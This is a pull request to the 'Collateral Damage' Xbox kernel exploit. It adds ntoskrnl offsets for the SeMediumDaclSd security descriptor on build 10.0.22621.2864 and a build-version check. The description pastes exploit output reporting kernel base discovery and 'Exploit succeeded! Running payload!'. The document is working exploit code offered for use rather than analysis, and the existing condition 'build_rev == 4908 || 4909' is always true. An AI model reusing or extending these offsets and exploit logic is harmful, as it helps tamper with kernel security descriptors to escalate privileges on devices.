### PR TITLE
feat: Add ntoskrnl offsets to SeMediumDaclSd for 10.0.22621.2864

### DIFF
--- a/collat_payload/collat_payload.c
+++ b/collat_payload/collat_payload.c
@@ -451,6 +451,11 @@ int main(int argc, char** argv)
             build_rev = 4908;
         }
     }
+    else if (build_version.NtBuildNumber == 22621 && build_version.NtBuildQfe == 2864)
+    {
+        // 10.0.22621.2864
+        build_rev = 2864;
+    }
 
     if (build_rev == 0)
     {

--- a/collat_payload/nt_offsets.c
+++ b/collat_payload/nt_offsets.c
@@ -11,12 +11,19 @@ VOID set_build_rev(ULONG rev)
 
 UINT64 get_sd_ptr_offset()
 {
-	if (build_rev == 4478)
+	if (build_rev == 2864)
 	{
+		// 10.0.22621.2864
+		return SD_PTR_OFFSET_2864;
+	}
+	else if (build_rev == 4478)
+	{
+		// 10.0.25398.4478
 		return SD_PTR_OFFSET_4478;
 	}
 	else if (build_rev == 4908 || 4909)
 	{
+		// 10.0.25398.4908/4909
 		return SD_PTR_OFFSET_4908;
 	}
 
@@ -25,12 +32,19 @@ UINT64 get_sd_ptr_offset()
 
 UINT64 get_orig_sd_offset()
 {
-	if (build_rev == 4478)
+	if (build_rev == 2864)
 	{
+		// 10.0.22621.2864
+		return ORIG_SD_OFFSET_2864;
+	}
+	else if (build_rev == 4478)
+	{
+		// 10.0.25398.4478
 		return ORIG_SD_OFFSET_4478;
 	}
 	else if (build_rev == 4908 || 4909)
 	{
+		// 10.0.25398.4908/4909
 		return ORIG_SD_OFFSET_4908;
 	}
 

--- a/collat_payload/nt_offsets.h
+++ b/collat_payload/nt_offsets.h
@@ -2,18 +2,23 @@
 #define _NT_OFFSETS
 #include <Windows.h>
 
+// Offsets for SeMediumDaclSd / Pointer to SeMediumDaclSd
 
 // PC
 //#define ORIG_SD_OFFSET 0xd55f20
 //#define SD_PTR_OFFSET 0xd55658
 
-// Xbox - 4478
-#define ORIG_SD_OFFSET_4478 0xC62B8
-#define SD_PTR_OFFSET_4478 0xC5A58
+// Xbox - 10.0.22621.2864 - Base: 0xFFFFF8004009F000
+#define ORIG_SD_OFFSET_2864 0xC0E48 // @ ntoskrnl.exe!0xFFFFF8004015FE48
+#define SD_PTR_OFFSET_2864 0xC05F0  // @ ntoskrnl.exe!0xFFFFF8004015F5F0
 
-// Xbox - 4908/4909
-#define ORIG_SD_OFFSET_4908 0xC62B8
-#define SD_PTR_OFFSET_4908 0xC5A48
+// Xbox - 10.0.25398.4478 - Base: 0xFFFFF8004009F000
+#define ORIG_SD_OFFSET_4478 0xC62B8 // @ ntoskrnl.exe!0xFFFFF800401652B8
+#define SD_PTR_OFFSET_4478 0xC5A58  // @ ntoskrnl.exe!0xFFFFF80040164A58
+
+// Xbox - 10.0.25398.4908/4909 - Base: 0xFFFFF8004009F000
+#define ORIG_SD_OFFSET_4908 0xC62B8 // @ ntoskrnl.exe!0xFFFFF800401652B8
+#define SD_PTR_OFFSET_4908 0xC5A48  // @ ntoskrnl.exe!0xFFFFF80040164A48
 
 VOID set_build_rev(ULONG rev);
 UINT64 get_sd_ptr_offset();


### PR DESCRIPTION
Proof

```
Connection received on 192.168.0.42 49738
Collateral Damage - @carrot_c4k3 & @landaire (exploits.forsale)
Build number: 22621.2864
Attempting to find kernel base...
Found likely kernel base: FFFFF801DBC00000
Attempting exploit...
Exploit succeeded! Running payload!
```